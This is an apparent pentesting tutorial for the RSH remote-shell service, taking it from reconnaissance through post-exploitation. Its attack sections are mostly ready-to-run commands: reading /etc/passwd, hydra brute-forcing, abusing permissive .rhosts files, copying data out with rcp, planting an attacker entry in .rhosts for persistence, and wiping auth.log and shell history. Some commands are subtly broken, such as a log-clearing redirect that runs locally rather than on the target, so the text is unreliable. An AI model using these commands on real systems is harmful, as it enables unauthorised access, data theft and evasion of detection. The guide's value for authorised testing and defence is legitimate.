RSH Pentesting

Default Port: 514

RSH (Remote Shell), is a protocol that allows users to execute shell commands on a remote machine. In this article, we will examine the pentesting techniques for RSH under the following categories: Connect, Recon, Enumeration, Attack Vectors, and Post-Exploitation.

Connect

Connecting to an RSH Service

You can connect to an RSH service using the rsh command. For example, on Linux, you can use the following command:

rsh <remote-server-ip>

This command allows you to connect to a specific remote server running the RSH service.

Executing Commands

Once connected, you can execute shell commands on the remote machine. For example:

rsh <remote-server-ip> -l <username> <command>

For example:

rsh 192.168.1.10 -l user ls -la

This command logs into the remote server with the specified username and runs the ls -la command.

Recon

Identifying an RSH Service

You can use Nmap to check if an RSH service is running on a specific host:

nmap -p 514 X.X.X.X

This command checks if there is a service running on port 514 of the specified IP address, which is commonly used by RSH.

Banner Grabbing

You can use Netcat or a similar tool to perform banner grabbing and retrieve information about the RSH service:

nc -nv X.X.X.X 514

This command collects banner information from the service running on port 514 of the given IP address.

Enumeration

Collecting System Information

Once connected via RSH, you can collect system information by executing various commands. For example:

    rsh <remote-server-ip> -l <username> uname -a
    rsh <remote-server-ip> -l <username> cat /etc/passwd

These commands retrieve the system's kernel version and list the contents of the passwd file.

Attack Vectors

Exploiting Weak Authentication

Check for weak authentication mechanisms. RSH often relies on the .rhosts file for authentication, which can be easily exploited if not properly configured.

Brute Force Attacks

You can perform brute-force attacks to guess weak passwords using tools like hydra:

hydra -l <username> -P /path/to/passwords.txt <target_ip> rsh

This command attempts to brute-force the specified RSH server.

Exploiting Misconfigurations

Look for misconfigured .rhosts files that allow unauthorized access. For example, a .rhosts file with the following entry can be exploited:

    + +

This entry allows any user from any host to log in without a password.

Post-Exploitation

Privilege Escalation

After gaining access, attempt to escalate privileges to a higher-level account. One common method is to search for SUID binaries:

rsh <remote-server-ip> -l <username> find / -perm -4000 -type f 2>/dev/null

This command lists all SUID binaries, which could potentially be exploited for privilege escalation.

Data Exfiltration

Once you have access, you can exfiltrate data from the remote machine. For example, you can copy files using the rcp (remote copy) command:

rcp <remote-server-ip>:<remote-file-path> <local-file-path>

Persistent Access

To maintain persistent access, you can add your SSH key to the ~/.ssh/authorized_keys file or modify the .rhosts file to allow your host:

echo "attacker-ip attacker-user" >> ~/.rhosts

This entry grants login permissions to the specified user on the attacker's IP address.

Covering Tracks

It's crucial to cover your tracks to avoid detection. You can delete log entries related to your activities:

rsh <remote-server-ip> -l <username> echo "" > /var/log/auth.log
rsh <remote-server-ip> -l <username> history -c

These commands clear the authentication log and command history.

---

This structure provides a comprehensive overview of pentesting activities directed towards RSH services. Always ensure you operate within ethical and legal boundaries while conducting such tests and have the appropriate authorization.